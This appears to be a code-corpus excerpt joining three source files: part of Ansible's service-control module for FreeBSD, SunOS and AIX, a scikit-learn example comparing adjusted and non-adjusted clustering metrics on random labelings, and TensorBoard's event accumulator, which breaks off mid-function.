initpaths = [ '/etc/rc.d' ] # better: $rc_directories - how to get in here? Run: sh -c '. /etc/rc.conf ; echo $rc_directories'
for initdir in initpaths:
initscript = "%s/%s" % (initdir,self.name)
if os.path.isfile(initscript):
self.svc_initscript = initscript
if not self.svc_initscript:
self.module.fail_json(msg='unable to find rc.d script')
def service_enable(self):
if self.enable:
self.rcconf_value = "YES"
else:
self.rcconf_value = "NO"
rcfiles = [ '/etc/rc.conf' ] # Overkill?
for rcfile in rcfiles:
if os.path.isfile(rcfile):
self.rcconf_file = rcfile
self.rcconf_key = "%s" % string.replace(self.name,"-","_")
return self.service_enable_rcconf()
def get_service_status(self):
self.svc_cmd = "%s" % self.svc_initscript
rc, stdout, stderr = self.execute_command("%s %s" % (self.svc_cmd, 'onestatus'))
if rc == 1:
self.running = False
elif rc == 0:
self.running = True
def service_control(self):
if self.action is "start":
self.action = "onestart"
if self.action is "stop":
self.action = "onestop"
self.svc_cmd = "%s" % self.svc_initscript
return self.execute_command("%s %s" % (self.svc_cmd, self.action), daemonize=True)
# ===========================================
# Subclass: SunOS
class SunOSService(Service):
"""
This is the SunOS Service manipulation class - it uses the svcadm
command for controlling services, and svcs command for checking status.
It also tries to be smart about taking the service out of maintenance
state if necessary.
"""
platform = 'SunOS'
distribution = None
def get_service_tools(self):
self.svcs_cmd = self.module.get_bin_path('svcs', True)
if not self.svcs_cmd:
self.module.fail_json(msg='unable to find svcs binary')
self.svcadm_cmd = self.module.get_bin_path('svcadm', True)
if not self.svcadm_cmd:
self.module.fail_json(msg='unable to find svcadm binary')
def get_service_status(self):
status = self.get_sunos_svcs_status()
# Only 'online' is considered properly running. Everything else is off
# or has some sort of problem.
if status == 'online':
self.running = True
else:
self.running = False
def get_sunos_svcs_status(self):
rc, stdout, stderr = self.execute_command("%s %s" % (self.svcs_cmd, self.name))
if rc == 1:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
lines = stdout.rstrip("\n").split("\n")
status = lines[-1].split(" ")[0]
# status is one of: online, offline, degraded, disabled, maintenance, uninitialized
# see man svcs(1)
return status
def service_enable(self):
# Get current service enablement status
rc, stdout, stderr = self.execute_command("%s -l %s" % (self.svcs_cmd, self.name))
if rc != 0:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
enabled = False
temporary = False
# look for enabled line, which could be one of:
# enabled true (temporary)
# enabled false (temporary)
# enabled true
# enabled false
for line in stdout.split("\n"):
if line.startswith("enabled"):
if "true" in line:
enabled = True
if "temporary" in line:
temporary = True
startup_enabled = (enabled and not temporary) or (not enabled and temporary)
if self.enable and startup_enabled:
return
elif (not self.enable) and (not startup_enabled):
return
# Mark service as started or stopped (this will have the side effect of
# actually stopping or starting the service)
if self.enable:
subcmd = "enable -rs"
else:
subcmd = "disable -s"
rc, stdout, stderr = self.execute_command("%s %s %s" % (self.svcadm_cmd, subcmd, self.name))
if rc != 0:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
self.changed = True
def service_control(self):
status = self.get_sunos_svcs_status()
# if starting or reloading, clear maintenace states
if self.action in ['start', 'reload', 'restart'] and status in ['maintenance', 'degraded']:
rc, stdout, stderr = self.execute_command("%s clear %s" % (self.svcadm_cmd, self.name))
if rc != 0:
return rc, stdout, stderr
status = self.get_sunos_svcs_status()
if status in ['maintenance', 'degraded']:
self.module.fail_json(msg="Failed to bring service out of %s status." % status)
if self.action == 'start':
subcmd = "enable -rst"
elif self.action == 'stop':
subcmd = "disable -st"
elif self.action == 'reload':
subcmd = "refresh"
elif self.action == 'restart' and status == 'online':
subcmd = "restart"
elif self.action == 'restart' and status != 'online':
subcmd = "enable -rst"
return self.execute_command("%s %s %s" % (self.svcadm_cmd, subcmd, self.name))
# ===========================================
# Subclass: AIX
class AIX(Service):
"""
This is the AIX Service (SRC) manipulation class - it uses lssrc, startsrc, stopsrc
and refresh for service control. Enabling a service is currently not supported.
Would require to add an entry in the /etc/inittab file (mkitab, chitab and rmitab
commands)
"""
platform = 'AIX'
distribution = None
def get_service_tools(self):
self.lssrc_cmd = self.module.get_bin_path('lssrc', True)
if not self.lssrc_cmd:
self.module.fail_json(msg='unable to find lssrc binary')
self.startsrc_cmd = self.module.get_bin_path('startsrc', True)
if not self.startsrc_cmd:
self.module.fail_json(msg='unable to find startsrc binary')
self.stopsrc_cmd = self.module.get_bin_path('stopsrc', True)
if not self.stopsrc_cmd:
self.module.fail_json(msg='unable to find stopsrc binary')
self.refresh_cmd = self.module.get_bin_path('refresh', True)
if not self.refresh_cmd:
self.module.fail_json(msg='unable to find refresh binary')
def get_service_status(self):
status = self.get_aix_src_status()
# Only 'active' is considered properly running. Everything else is off
# or has some sort of problem.
if status == 'active':
self.running = True
else:
self.running = False
def get_aix_src_status(self):
rc, stdout, stderr = self.execute_command("%s -s %s" % (self.lssrc_cmd, self.name))
if rc == 1:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
lines = stdout.rstrip("\n").split("\n")
status = lines[-1].split(" ")[-1]
# status is one of: active, inoperative
return status
def service_control(self):
if self.action == 'start':
srccmd = self.startsrc_cmd
elif self.action == 'stop':
srccmd = self.stopsrc_cmd
elif self.action == 'reload':
srccmd = self.refresh_cmd
elif self.action == 'restart':
self.execute_command("%s -s %s" % (self.stopsrc_cmd, self.name))
srccmd = self.startsrc_cmd
if self.arguments and self.action == 'start':
return self.execute_command("%s -a \"%s\" -s %s" % (srccmd, self.arguments, self.name))
else:
return self.execute_command("%s -s %s" % (srccmd, self.name))
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
state = dict(choices=['running', 'started', 'stopped', 'restarted', 'reloaded']),
sleep = dict(required=False, type='int', default=None),
pattern = dict(required=False, default=None),
enabled = dict(type='bool'),
runlevel = dict(required=False, default='default'),
arguments = dict(aliases=['args'], default=''),
must_exist = dict(type='bool', default=True),
),
supports_check_mode=True
)
if module.params['state'] is None and module.params['enabled'] is None:
module.fail_json(msg="Neither 'state' nor 'enabled' set")
service = Service(module)
if service.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'Service instantiated - platform %s' % service.platform)
if service.distribution:
syslog.syslog(syslog.LOG_NOTICE, 'Service instantiated - distribution %s' % service.distribution)
rc = 0
out = ''
err = ''
result = {}
result['name'] = service.name
# Find service management tools
service.get_service_tools()
# Enable/disable service startup at boot if requested
if service.module.params['enabled'] is not None:
# FIXME: ideally this should detect if we need to toggle the enablement state, though
# it's unlikely the changed handler would need to fire in this case so it's a minor thing.
service.service_enable()
result['enabled'] = service.enable
if module.params['state'] is None:
# Not changing the running state, so bail out now.
result['changed'] = service.changed
module.exit_json(**result)
result['state'] = service.state
# Collect service status
if service.pattern:
service.check_ps()
else:
service.get_service_status()
# Calculate if request will change service state
service.check_service_changed()
# Modify service state if necessary
(rc, out, err) = service.modify_service_state()
if rc != 0:
if err and "Job is already running" in err:
# upstart got confused, one such possibility is MySQL on Ubuntu 12.04
# where status may report it has no start/stop links and we could
# not get accurate status
pass
else:
if err:
module.fail_json(msg=err)
else:
module.fail_json(msg=out)
result['changed'] = service.changed | service.svc_change
if service.module.params['enabled'] is not None:
result['enabled'] = service.module.params['enabled']
if not service.module.params['state']:
status = service.get_service_status()
if status is None:
result['state'] = 'absent'
elif status is False:
result['state'] = 'started'
else:
result['state'] = 'stopped'
else:
# as we may have just bounced the service the service command may not
# report accurate state at this moment so just show what we ran
if service.module.params['state'] in ['started','restarted','running','reloaded']:
result['state'] = 'started'
else:
result['state'] = 'stopped'
module.exit_json(**result)
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
ominux/scikit-learn | examples/cluster/plot_adjusted_for_chance_measures.py | 1 | 4105 | """
==========================================================
Adjustment for chance in clustering performance evaluation
==========================================================
The following plots demonstrate the impact of the number of clusters and
number of samples on various clustering performance evaluation metrics.
Non-adjusted measures such as the V-Measure show a dependency between
the number of clusters and the number of samples: the mean V-Measure
of random labeling increases signicantly as the number of clusters is
closer to the total number of samples used to compute the measure.
Adjusted for chance measure such as ARI display some random variations
centered around a mean score of 0.0 for any number of samples and
clusters.
Only adjusted measures can hence safely be used as a consensus index
to evaluate the average stability of clustering algorithms for a given
value of k on various overlapping sub-samples of the dataset.
"""
print __doc__
# Author: Olivier Grisel <[email protected]>
# License: Simplified BSD
import numpy as np
import pylab as pl
from sklearn import metrics
def uniform_labelings_scores(score_func, n_samples, n_clusters_range,
fixed_n_classes=None, n_runs=10, seed=42):
"""Compute score for 2 random uniform cluster labelings.
Both random labelings have the same number of clusters for each value
possible value in ``n_clusters_range``.
When fixed_n_classes is not None the first labeling is considered a ground
truth class assignement with fixed number of classes.
"""
random_labels = np.random.RandomState(seed).random_integers
scores = np.zeros((len(n_clusters_range), n_runs))
if fixed_n_classes is not None:
labels_a = random_labels(low=0, high=fixed_n_classes - 1,
size=n_samples)
for i, k in enumerate(n_clusters_range):
for j in range(n_runs):
if fixed_n_classes is None:
labels_a = random_labels(low=0, high=k - 1, size=n_samples)
labels_b = random_labels(low=0, high=k - 1, size=n_samples)
scores[i, j] = score_func(labels_a, labels_b)
return scores
score_funcs = [
metrics.adjusted_rand_score,
metrics.v_measure_score,
]
# 2 independent random clusterings with equal cluster number
n_samples = 100
n_clusters_range = np.linspace(2, n_samples, 10).astype(np.int)
pl.figure(1)
plots = []
names = []
for score_func in score_funcs:
print "Computing %s for %d values of n_clusters and n_samples=%d" % (
score_func.__name__, len(n_clusters_range), n_samples)
scores = uniform_labelings_scores(score_func, n_samples, n_clusters_range)
plots.append(pl.errorbar(
n_clusters_range, scores.mean(axis=1), scores.std(axis=1)))
names.append(score_func.__name__)
pl.title("Clustering measures for 2 random uniform labelings\n"
"with equal number of clusters")
pl.xlabel('Number of clusters (Number of samples is fixed to %d)' % n_samples)
pl.ylabel('Score value')
pl.legend(plots, names)
pl.ylim(ymin=-0.05, ymax=1.05)
pl.show()
# Random labeling with varying n_clusters against ground class labels
# with fixed number of clusters
n_samples = 1000
n_clusters_range = np.linspace(2, 100, 10).astype(np.int)
n_classes = 10
pl.figure(2)
plots = []
names = []
for score_func in score_funcs:
print "Computing %s for %d values of n_clusters and n_samples=%d" % (
score_func.__name__, len(n_clusters_range), n_samples)
scores = uniform_labelings_scores(score_func, n_samples, n_clusters_range,
fixed_n_classes=n_classes)
plots.append(pl.errorbar(
n_clusters_range, scores.mean(axis=1), scores.std(axis=1)))
names.append(score_func.__name__)
pl.title("Clustering measures for random uniform labeling\n"
"against reference assignement with %d classes" % n_classes)
pl.xlabel('Number of clusters (Number of samples is fixed to %d)' % n_samples)
pl.ylabel('Score value')
pl.ylim(ymin=-0.05, ymax=1.05)
pl.legend(plots, names)
pl.show()
| bsd-3-clause |
sugartom/tensorflow-alien | tensorflow/tensorboard/backend/event_processing/event_accumulator.py | 2 | 30610 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Takes a generator of values, and accumulates them for a frontend."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import re
import threading
import numpy as np
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf.config_pb2 import RunMetadata
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import tensor_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.tensorboard.backend.event_processing import directory_watcher
from tensorflow.tensorboard.backend.event_processing import event_file_loader
from tensorflow.tensorboard.backend.event_processing import reservoir
namedtuple = collections.namedtuple
ScalarEvent = namedtuple('ScalarEvent', ['wall_time', 'step', 'value'])
HealthPillEvent = namedtuple(
'HealthPillEvent',
['wall_time', 'step', 'node_name', 'output_slot', 'value'])
CompressedHistogramEvent = namedtuple('CompressedHistogramEvent',
['wall_time', 'step',
'compressed_histogram_values'])
CompressedHistogramValue = namedtuple('CompressedHistogramValue',
['basis_point', 'value'])
HistogramEvent = namedtuple('HistogramEvent',
['wall_time', 'step', 'histogram_value'])
HistogramValue = namedtuple('HistogramValue', ['min', 'max', 'num', 'sum',
'sum_squares', 'bucket_limit',
'bucket'])
ImageEvent = namedtuple('ImageEvent', ['wall_time', 'step',
'encoded_image_string', 'width',
'height'])
AudioEvent = namedtuple('AudioEvent', ['wall_time', 'step',
'encoded_audio_string', 'content_type',
'sample_rate', 'length_frames'])
TensorEvent = namedtuple('TensorEvent', ['wall_time', 'step', 'tensor_proto'])
## Different types of summary events handled by the event_accumulator
SUMMARY_TYPES = {
'simple_value': '_ProcessScalar',
'histo': '_ProcessHistogram',
'image': '_ProcessImage',
'audio': '_ProcessAudio',
'tensor': '_ProcessTensor',
}
## The tagTypes below are just arbitrary strings chosen to pass the type
## information of the tag from the backend to the frontend
COMPRESSED_HISTOGRAMS = 'compressedHistograms'
HISTOGRAMS = 'histograms'
IMAGES = 'images'
AUDIO = 'audio'
SCALARS = 'scalars'
TENSORS = 'tensors'
HEALTH_PILLS = 'health_pills'
GRAPH = 'graph'
META_GRAPH = 'meta_graph'
RUN_METADATA = 'run_metadata'
## Normal CDF for std_devs: (-Inf, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, Inf)
## naturally gives bands around median of width 1 std dev, 2 std dev, 3 std dev,
## and then the long tail.
NORMAL_HISTOGRAM_BPS = (0, 668, 1587, 3085, 5000, 6915, 8413, 9332, 10000)
DEFAULT_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 500,
IMAGES: 4,
AUDIO: 4,
SCALARS: 10000,
# We store this many health pills per op.
HEALTH_PILLS: 100,
HISTOGRAMS: 1,
TENSORS: 10,
}
STORE_EVERYTHING_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 0,
IMAGES: 0,
AUDIO: 0,
SCALARS: 0,
HEALTH_PILLS: 0,
HISTOGRAMS: 0,
TENSORS: 0,
}
# The tag that values containing health pills have. Health pill data is stored
# in tensors. In order to distinguish health pill values from scalar values, we
# rely on how health pill values have this special tag value.
HEALTH_PILL_EVENT_TAG = '__health_pill__'
def IsTensorFlowEventsFile(path):
"""Check the path name to see if it is probably a TF Events file.
Args:
path: A file path to check if it is an event file.
Raises:
ValueError: If the path is an empty string.
Returns:
If path is formatted like a TensorFlowEventsFile.
"""
if not path:
raise ValueError('Path must be a nonempty string')
return 'tfevents' in compat.as_str_any(os.path.basename(path))
class EventAccumulator(object):
"""An `EventAccumulator` takes an event generator, and accumulates the values.
The `EventAccumulator` is intended to provide a convenient Python interface
for loading Event data written during a TensorFlow run. TensorFlow writes out
`Event` protobuf objects, which have a timestamp and step number, and often
contain a `Summary`. Summaries can have different kinds of data like an image,
a scalar value, or a histogram. The Summaries also have a tag, which we use to
organize logically related data. The `EventAccumulator` supports retrieving
the `Event` and `Summary` data by its tag.
Calling `Tags()` gets a map from `tagType` (e.g. `'images'`,
`'compressedHistograms'`, `'scalars'`, etc) to the associated tags for those
data types. Then, various functional endpoints (eg
`Accumulator.Scalars(tag)`) allow for the retrieval of all data
associated with that tag.
The `Reload()` method synchronously loads all of the data written so far.
Histograms, audio, and images are very large, so storing all of them is not
recommended.
@@Tensors
"""
def __init__(self,
path,
size_guidance=DEFAULT_SIZE_GUIDANCE,
compression_bps=NORMAL_HISTOGRAM_BPS,
purge_orphaned_data=True):
"""Construct the `EventAccumulator`.
Args:
path: A file path to a directory containing tf events files, or a single
tf events file. The accumulator will load events from this path.
size_guidance: Information on how much data the EventAccumulator should
store in memory. The DEFAULT_SIZE_GUIDANCE tries not to store too much
so as to avoid OOMing the client. The size_guidance should be a map
from a `tagType` string to an integer representing the number of
items to keep per tag for items of that `tagType`. If the size is 0,
all events are stored.
compression_bps: Information on how the `EventAccumulator` should compress
histogram data for the `CompressedHistograms` tag (for details see
`ProcessCompressedHistogram`).
purge_orphaned_data: Whether to discard any events that were "orphaned" by
a TensorFlow restart.
"""
sizes = {}
for key in DEFAULT_SIZE_GUIDANCE:
if key in size_guidance:
sizes[key] = size_guidance[key]
else:
sizes[key] = DEFAULT_SIZE_GUIDANCE[key]
self._first_event_timestamp = None
self._scalars = reservoir.Reservoir(size=sizes[SCALARS])
# Unlike the other reservoir, the reservoir for health pills is keyed by the
# name of the op instead of the tag. This lets us efficiently obtain the
# health pills per node.
self._health_pills = reservoir.Reservoir(size=sizes[HEALTH_PILLS])
self._graph = None
self._graph_from_metagraph = False
self._meta_graph = None
self._tagged_metadata = {}
self._histograms = reservoir.Reservoir(size=sizes[HISTOGRAMS])
self._compressed_histograms = reservoir.Reservoir(
size=sizes[COMPRESSED_HISTOGRAMS], always_keep_last=False)
self._images = reservoir.Reservoir(size=sizes[IMAGES])
self._audio = reservoir.Reservoir(size=sizes[AUDIO])
self._tensors = reservoir.Reservoir(size=sizes[TENSORS])
self._generator_mutex = threading.Lock()
self._generator = _GeneratorFromPath(path)
self._compression_bps = compression_bps
self.purge_orphaned_data = purge_orphaned_data
self.most_recent_step = -1
self.most_recent_wall_time = -1
self.file_version = None
# The attributes that get built up by the accumulator
self.accumulated_attrs = ('_scalars', '_histograms',
'_compressed_histograms', '_images', '_audio')
self._tensor_summaries = {}
def Reload(self):
"""Loads all events added since the last call to `Reload`.
If `Reload` was never called, loads all events in the file.
Returns:
The `EventAccumulator`.
"""
with self._generator_mutex:
for event in self._generator.Load():
self._ProcessEvent(event)
return self
def FirstEventTimestamp(self):
"""Returns the timestamp in seconds of the first event.
If the first event has been loaded (either by this method or by `Reload`,
this returns immediately. Otherwise, it will load in the first event. Note
that this means that calling `Reload` will cause this to block until
`Reload` has finished.
Returns:
The timestamp in seconds of the first event that was loaded.
Raises:
ValueError: If no events have been loaded and there were no events found
on disk.
"""
if self._first_event_timestamp is not None:
return self._first_event_timestamp
with self._generator_mutex:
try:
event = next(self._generator.Load())
self._ProcessEvent(event)
return self._first_event_timestamp
except StopIteration:
raise ValueError('No event timestamp could be found')
def _ProcessEvent(self, event):
"""Called whenever an event is loaded."""
if self._first_event_timestamp is None:
self._first_event_timestamp = event.wall_time
if event.HasField('file_version'):
new_file_version = _ParseFileVersion(event.file_version)
if self.file_version and self.file_version != new_file_version:
## This should not happen.
logging.warn(('Found new file_version for event.proto. This will '
'affect purging logic for TensorFlow restarts. '
'Old: {0} New: {1}').format(self.file_version,
new_file_version))
self.file_version = new_file_version
self._MaybePurgeOrphanedData(event)
## Process the event.
# GraphDef and MetaGraphDef are handled in a special way:
# If no graph_def Event is available, but a meta_graph_def is, and it
# contains a graph_def, then use the meta_graph_def.graph_def as our graph.
# If a graph_def Event is available, always prefer it to the graph_def
# inside the meta_graph_def.
if event.HasField('graph_def'):
if self._graph is not None:
logging.warn(('Found more than one graph event per run, or there was '
'a metagraph containing a graph_def, as well as one or '
'more graph events. Overwriting the graph with the '
'newest event.'))
self._graph = event.graph_def
self._graph_from_metagraph = False
elif event.HasField('meta_graph_def'):
if self._meta_graph is not None:
logging.warn(('Found more than one metagraph event per run. '
'Overwriting the metagraph with the newest event.'))
self._meta_graph = event.meta_graph_def
if self._graph is None or self._graph_from_metagraph:
# We may have a graph_def in the metagraph. If so, and no
# graph_def is directly available, use this one instead.
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
if meta_graph.graph_def:
if self._graph is not None:
logging.warn(('Found multiple metagraphs containing graph_defs,'
'but did not find any graph events. Overwriting the '
'graph with the newest metagraph version.'))
self._graph_from_metagraph = True
self._graph = meta_graph.graph_def.SerializeToString()
elif event.HasField('tagged_run_metadata'):
tag = event.tagged_run_metadata.tag
if tag in self._tagged_metadata:
logging.warn('Found more than one "run metadata" event with tag ' +
tag + '. Overwriting it with the newest event.')
self._tagged_metadata[tag] = event.tagged_run_metadata.run_metadata
elif event.HasField('summary'):
for value in event.summary.value:
if value.HasField('tensor') and value.tag == HEALTH_PILL_EVENT_TAG:
self._ProcessHealthPillSummary(value, event)
else:
for summary_type, summary_func in SUMMARY_TYPES.items():
if value.HasField(summary_type):
datum = getattr(value, summary_type)
tag = value.node_name if summary_type == 'tensor' else value.tag
getattr(self, summary_func)(tag, event.wall_time, event.step,
datum)
def _ProcessHealthPillSummary(self, value, event):
"""Process summaries containing health pills.
These summaries are distinguished by the fact that they have a Tensor field
and have a special tag value.
This method emits ERROR-level messages to the logs if it encounters Tensor
summaries that it cannot process.
Args:
value: A summary_pb2.Summary.Value with a Tensor field.
event: The event_pb2.Event containing that value.
"""
elements = tensor_util.MakeNdarray(value.tensor)
# The node_name property of the value object is actually a watch key: a
# combination of node name, output slot, and a suffix. We capture the
# actual node name and the output slot with a regular expression.
match = re.match(r'^(.*):(\d+):DebugNumericSummary$', value.node_name)
if not match:
logging.log_first_n(
logging.ERROR,
'Unsupported watch key %s for health pills; skipping this sequence.',
1,
value.node_name)
return
node_name = match.group(1)
output_slot = int(match.group(2))
self._ProcessHealthPill(
event.wall_time, event.step, node_name, output_slot, elements)
def Tags(self):
"""Return all tags found in the value stream.
Returns:
A `{tagType: ['list', 'of', 'tags']}` dictionary.
"""
return {
IMAGES: self._images.Keys(),
AUDIO: self._audio.Keys(),
HISTOGRAMS: self._histograms.Keys(),
SCALARS: self._scalars.Keys(),
COMPRESSED_HISTOGRAMS: self._compressed_histograms.Keys(),
TENSORS: self._tensors.Keys(),
# Use a heuristic: if the metagraph is available, but
# graph is not, then we assume the metagraph contains the graph.
GRAPH: self._graph is not None,
META_GRAPH: self._meta_graph is not None,
RUN_METADATA: list(self._tagged_metadata.keys())
}
def Scalars(self, tag):
"""Given a summary tag, return all associated `ScalarEvent`s.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ScalarEvent`s.
"""
return self._scalars.Items(tag)
def HealthPills(self, node_name):
"""Returns all health pill values for a certain node.
Args:
node_name: The name of the node to obtain health pills for.
Raises:
KeyError: If the node name is not found.
Returns:
An array of `HealthPillEvent`s.
"""
return self._health_pills.Items(node_name)
def Graph(self):
"""Return the graph definition, if there is one.
If the graph is stored directly, return that. If no graph is stored
directly but a metagraph is stored containing a graph, return that.
Raises:
ValueError: If there is no graph for this run.
Returns:
The `graph_def` proto.
"""
graph = graph_pb2.GraphDef()
if self._graph is not None:
graph.ParseFromString(self._graph)
return graph
raise ValueError('There is no graph in this EventAccumulator')
def MetaGraph(self):
"""Return the metagraph definition, if there is one.
Raises:
ValueError: If there is no metagraph for this run.
Returns:
The `meta_graph_def` proto.
"""
if self._meta_graph is None:
raise ValueError('There is no metagraph in this EventAccumulator')
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
return meta_graph
def RunMetadata(self, tag):
"""Given a tag, return the associated session.run() metadata.
Args:
tag: A string tag associated with the event.
Raises:
ValueError: If the tag is not found.
Returns:
The metadata in form of `RunMetadata` proto.
"""
if tag not in self._tagged_metadata:
raise ValueError('There is no run metadata with this tag name')
run_metadata = RunMetadata()
run_metadata.ParseFromString(self._tagged_metadata[tag])
return run_metadata
def Histograms(self, tag):
"""Given a summary tag, return all associated histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `HistogramEvent`s.
"""
return self._histograms.Items(tag)
def CompressedHistograms(self, tag):
"""Given a summary tag, return all associated compressed histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `CompressedHistogramEvent`s.
"""
return self._compressed_histograms.Items(tag)
def Images(self, tag):
"""Given a summary tag, return all associated images.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ImageEvent`s.
"""
return self._images.Items(tag)
def Audio(self, tag):
"""Given a summary tag, return all associated audio.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `AudioEvent`s.
"""
return self._audio.Items(tag)
def Tensors(self, tag):
"""Given a summary tag, return all associated tensors.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `TensorEvent`s.
"""
return self._tensors.Items(tag)
def _MaybePurgeOrphanedData(self, event):
"""Maybe purge orphaned data due to a TensorFlow crash.
When TensorFlow crashes at step T+O and restarts at step T, any events
written after step T are now "orphaned" and will be at best misleading if
they are included in TensorBoard.
This logic attempts to determine if there is orphaned data, and purge it
if it is found.
Args:
event: The event to use as a reference, to determine if a purge is needed.
"""
if not self.purge_orphaned_data:
return
## Check if the event happened after a crash, and purge expired tags.
if self.file_version and self.file_version >= 2:
## If the file_version is recent enough, use the SessionLog enum
## to check for restarts.
self._CheckForRestartAndMaybePurge(event)
else:
## If there is no file version, default to old logic of checking for
## out of order steps.
self._CheckForOutOfOrderStepAndMaybePurge(event)
def _CheckForRestartAndMaybePurge(self, event):
"""Check and discard expired events using SessionLog.START.
Check for a SessionLog.START event and purge all previously seen events
with larger steps, because they are out of date. Because of supervisor
threading, it is possible that this logic will cause the first few event
messages to be discarded since supervisor threading does not guarantee
that the START message is deterministically written first.
This method is preferred over _CheckForOutOfOrderStepAndMaybePurge which
can inadvertently discard events due to supervisor threading.
Args:
event: The event to use as reference. If the event is a START event, all
previously seen events with a greater event.step will be purged.
"""
if event.HasField(
'session_log') and event.session_log.status == SessionLog.START:
self._Purge(event, by_tags=False)
def _CheckForOutOfOrderStepAndMaybePurge(self, event):
"""Check for out-of-order event.step and discard expired events for tags.
Check if the event is out of order relative to the global most recent step.
If it is, purge outdated summaries for tags that the event contains.
Args:
event: The event to use as reference. If the event is out-of-order, all
events with the same tags, but with a greater event.step will be purged.
"""
if event.step < self.most_recent_step and event.HasField('summary'):
self._Purge(event, by_tags=True)
else:
self.most_recent_step = event.step
self.most_recent_wall_time = event.wall_time
def _ConvertHistogramProtoToTuple(self, histo):
return HistogramValue(min=histo.min,
max=histo.max,
num=histo.num,
sum=histo.sum,
sum_squares=histo.sum_squares,
bucket_limit=list(histo.bucket_limit),
bucket=list(histo.bucket))
def _ProcessHistogram(self, tag, wall_time, step, histo):
"""Processes a proto histogram by adding it to accumulated state."""
histo = self._ConvertHistogramProtoToTuple(histo)
histo_ev = HistogramEvent(wall_time, step, histo)
self._histograms.AddItem(tag, histo_ev)
self._compressed_histograms.AddItem(
tag, histo_ev, lambda x: _CompressHistogram(x, self._compression_bps))
def _ProcessImage(self, tag, wall_time, step, image):
"""Processes an image by adding it to accumulated state."""
event = ImageEvent(wall_time=wall_time,
step=step,
encoded_image_string=image.encoded_image_string,
width=image.width,
height=image.height)
self._images.AddItem(tag, event)
def _ProcessAudio(self, tag, wall_time, step, audio):
"""Processes a audio by adding it to accumulated state."""
event = AudioEvent(wall_time=wall_time,
step=step,
encoded_audio_string=audio.encoded_audio_string,
content_type=audio.content_type,
sample_rate=audio.sample_rate,
length_frames=audio.length_frames)
self._audio.AddItem(tag, event)
def _ProcessScalar(self, tag, wall_time, step, scalar):
"""Processes a simple value by adding it to accumulated state."""
sv = ScalarEvent(wall_time=wall_time, step=step, value=scalar)
self._scalars.AddItem(tag, sv)
def _ProcessTensor(self, tag, wall_time, step, tensor):
tv = TensorEvent(wall_time=wall_time, step=step, tensor_proto=tensor)
self._tensors.AddItem(tag, tv)
def _ProcessHealthPill(self, wall_time, step, node_name, output_slot,
elements):
"""Processes a health pill value by adding it to accumulated state.
Args:
wall_time: The time at which the health pill was created. Provided by the
debugger.
step: The step at which the health pill was created. Provided by the
debugger.
node_name: The name of the node for this health pill.
output_slot: The output slot for this health pill.
elements: An ND array of 12 floats. The elements of the health pill.
"""
# Key by the node name for fast retrieval of health pills by node name. The
# array is cast to a list so that it is JSON-able. The debugger data plugin
# serves a JSON response.
self._health_pills.AddItem(
node_name,
HealthPillEvent(
wall_time=wall_time,
step=step,
node_name=node_name,
output_slot=output_slot,
value=list(elements)))
def _Purge(self, event, by_tags):
"""Purge all events that have occurred after the given event.step.
If by_tags is True, purge all events that occurred after the given
event.step, but only for the tags that the event has. Non-sequential
event.steps suggest that a TensorFlow restart occurred, and we discard
the out-of-order events to display a consistent view in TensorBoard.
Discarding by tags is the safer method, when we are unsure whether a restart
has occurred, given that threading in supervisor can cause events of
different tags to arrive with unsynchronized step values.
If by_tags is False, then purge all events with event.step greater than the
given event.step. This can be used when we are certain that a TensorFlow
restart has occurred and these events can be discarded.
Args:
event: The event to use as reference for the purge. All events with
the same tags, but with a greater event.step will be purged.
by_tags: Bool to dictate whether to discard all out-of-order events or
only those that are associated with the given reference event.
"""
## Keep data in reservoirs that has a step less than event.step
_NotExpired = lambda x: x.step < event.step
if by_tags:
def _ExpiredPerTag(value):
return [getattr(self, x).FilterItems(_NotExpired, value.tag)
for x in self.accumulated_attrs]
expired_per_tags = [_ExpiredPerTag(value)
for value in event.summary.value]
expired_per_type = [sum(x) for x in zip(*expired_per_tags)]
else:
expired_per_type = [getattr(self, x).FilterItems(_NotExpired)
for x in self.accumulated_attrs]
if sum(expired_per_type) > 0:
purge_msg = _GetPurgeMessage(self.most_recent_step,
self.most_recent_wall_time, event.step,
event.wall_time, *expired_per_type)
logging.warn(purge_msg)
def _GetPurgeMessage(most_recent_step, most_recent_wall_time, event_step,
event_wall_time, num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio):
"""Return the string message associated with TensorBoard purges."""
